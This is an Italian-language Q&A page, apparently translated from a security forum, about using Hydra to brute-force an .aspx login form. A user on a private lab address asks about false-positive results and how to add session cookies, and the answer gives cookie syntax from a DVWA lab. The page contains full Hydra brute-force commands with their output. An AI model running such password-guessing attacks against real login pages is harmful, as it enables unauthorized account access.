come ottenere i cookie dal sito di aspx per usarlo con hydra

Naviga le tue risposte
4

Ho giocato con Hydra e il sito .aspx e ho avuto un po 'di intoppo - Hydra risponde facendomi sapere che le prime 16 password nel mio elenco di password sono corrette quando nessuna di esse è presente.

Sintassi: 

hydra 192.168.88.196 -l admin -P /root/lower http-post-form "/mmm/index.aspx:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect."

Output 

Hydra v7.3 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2015-05-05 22:30:51

[DATA] 16 tasks, 1 server, 815 login tries (l:1/p:815), ~50 tries per task

[DATA] attacking service http-get-form on port 80

[80][www-form] host: 192.168.88.196   login: admin   password: adrianna

[STATUS] attack finished for 192.168.88.196 (waiting for children to finish)

[80][www-form] host: 192.168.88.196   login: admin   password: adrian

[80][www-form] host: 192.168.88.196   login: admin   password: aerobics

[80][www-form] host: 192.168.88.196   login: admin   password: academic

[80][www-form] host: 192.168.88.196   login: admin   password: access

[80][www-form] host: 192.168.88.196   login: admin   password: abc

[80][www-form] host: 192.168.88.196   login: admin   password: admin

[80][www-form] host: 192.168.88.196   login: admin   password: academia

[80][www-form] host: 192.168.88.196   login: admin   password: albatross

[80][www-form] host: 192.168.88.196   login: admin   password: alex

[80][www-form] host: 192.168.88.196   login: admin   password: airplane

[80][www-form] host: 192.168.88.196   login: admin   password: albany

[80][www-form] host: 192.168.88.196   login: admin   password: ada

[80][www-form] host: 192.168.88.196   login: admin   password: aaa

[80][www-form] host: 192.168.88.196   login: admin   password: albert

[80][www-form] host: 192.168.88.196   login: admin   password: alexander

1 of 1 target successfuly completed, 16 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2015-05-05 22:30:51

Ho letto che possiamo aggiungere cookie a hydra okay: "H=Cookie: security;low;PHPSESSID=<value for PHP SESSID cookie"

  1. Come si ottengono i cookie da aspx?
  2. Come lo fornite a Hydra?
posta user3306821 17.05.2015 - 12:09
fonte

1 risposta

4

Utilizza un plug-in del browser come Cookie Manager Plus su Firefox, quindi puoi semplicemente copiare il valore negli appunti.

Come dici tu, basta incollare il valore nella riga di comando per Hydra.

Vedi la mia risposta qui per la sintassi che ha funzionato per me. 

"/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=incorrect:H=Cookie: PHPSESSID=07b7ebb2faea96f8471ecdb759e68108; security=low"

Quindi anziché PHPSESSID e il valore includi il nome dell'ID di sessione ASP.NET e il valore.

    
risposta data 17.05.2015 - 19:38
fonte

Leggi altre domande sui tag

PKCS7 vs TLS 1.2 padding Perché FREAK è presentato come una vulnerabilità nuova di zecca?